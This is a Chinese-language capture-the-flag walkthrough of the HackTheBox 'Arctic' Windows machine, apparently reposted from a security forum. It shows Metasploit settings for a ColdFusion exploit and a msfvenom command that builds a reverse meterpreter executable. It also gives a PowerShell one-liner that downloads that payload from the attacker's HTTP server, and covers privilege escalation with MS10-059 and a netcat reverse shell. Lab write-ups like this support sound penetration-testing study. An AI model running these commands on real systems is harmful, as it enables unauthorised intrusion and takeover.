HTB靶场记录之Arctic
本文是 i 春秋论坛作家「皮卡皮卡丘」表哥分享的技术文章,旨在为大家提供更多的学习方法与技能技巧,文章仅供学习参考。
相关文章>>
本文是 i 春秋论坛作家「皮卡皮卡丘」表哥分享的技术文章,公众号旨在为大家提供更多的学习方法与技能技巧,文章仅供学习参考。
HTB是一个靶机平台,里面包含多种系统类型的靶机,并且很多靶机非常贴近实战情景,是一个学习渗透测试不错的靶场。
这次的靶机是windows靶机。建议用MSF做前期的getshell,这样方便点。提权部分可能要手工编造PowerShell脚本传文件。
2、信息收集
还是先用nmap进行一波端口探测,终于遇到一个没80端口的了。
命令:nmap -A -sS -sV -v -p- 10.10.10.11
这里只能慢慢一个一个查,8500端口是唯一能正常访问的。
3、利用MSF get shell
遇事不决问MSF,然而一搜就发现太多payload了。。。
那只能先进入MSF,找到一个扫描版本的payload。
这样可以缩短查找范围:
那么使用该payload,设置好参数以后run,成功得知版本为8。
缩短范围后,可以确定我们这次要用的payload是这个MSF自带的。
然而裂开了,第一次卡BUG卡在设置payload好久。请教一下大佬,结果要设置延迟时间。我们去到payload那里改,把5改为30。
此时重启波MSF使用
exploit/windows/http/coldfusion_fckeditorpayload。设置波参数成功得到一个普通用户shell。
命令:set RHOSTS 10.10.10.11
SetRPORT 8500
SetLHOST 10.10.14.5
SetLPORT 5555
run
顺便去到tolis/desktop得到flag。
4、添加shell
虽然我们拿到了shell,但提权对于我这种菜鸡来说还是太难了。需要用到MSF的local_exploit_suggester。我们需要在MSF下再拿一个shell运行它。所以需要先制作一个小exe的马
命令:msfVENOM
-pwindows/x64/meterpreter_reverse_tcp LHOST=10.10.14.5 LPORT=5555 -f exe>shell1.exe
然后打开我们的python3共享模式:
命令: python -m http.server 8082 此时在我们的靶机上要把exe给下载过来。
研究了一下传输命令,需要用到PowerShell,去网上找了个模板套了一下变成以下命令,成功把shell1.exe传过来了。
命令: PowerShell (new-object Net.WebClient).DownloadFile('
http://10.10.14.5:8082/shell1.exe','c:\Users\tolis\Desktop\shell1.exe')
同时启动MSF,用exploit/multi/handler payload,注意这里一定要设置payload为
windows/x64/meterpreter_reverse_tcp。这里在靶机上运行shell1.exe成功进入meterpreter。这时候我们同时有2个shell了。
5、利用辅助得到可利用的漏洞信息
关于windows靶机提权有2种方法第一种是利用MSF获得shell以后要使用到自带神器local_exploit_suggester。可以看到有3个可以利用的。据大佬说这3个都可以利用。
命令:ctrl+z Y 退出meterpreter回到background界面
usepost/multi/recon/local_exploit_suggester
setsession n
run
另外一种方法是有一个用神器windowexploitsuggester,比MSF扫出的多点。最后决定用MS10-059。
经过逐一筛选可确定是MS10-059有个payload在github页面
https://github.com/Re4son/Chimichurri
6、提权
大佬随便用MSF选那3个检测的洞就能搞定。而我各种线程注入,钻来钻去都失败了。重启靶机n次都不行。
只能用powershell脚本把我的Chimichurri.exe下载传过来。然后再慢慢弄。
这里演示如果我没用MSF添加shell时,如何方便传文件。
这是最终版powershell脚本,Windows上echo跟Linux echo一样同样可以写入文件里面。
这里解析一波,如果我说的不对请多多包容。
首先我们要创建一个WebClient对象(New-Object System.Net.WebClient)然后赋值給变量$webclient。
接着定义好我们要用python共享的端口和文件(注意一定要对大小写特别敏感,GitHub上下载下来的是Chimichurri.exe,而我这里写的是chimichurri.exe,我还疑惑了好久到底是哪出问题了)。然后指定接收后的文件改名为exploit.exe。而后面的WebClient.DownloadFile就是把将具有指定URL的文件下载到靶机上。最后开始用powershell.exe执行。这是菜鸟脚本而已。实在不行就在MSF添加shell以后上传也行。
然后在靶机上执行,记得提前开启波Nc反弹。
成功变为最高级权限。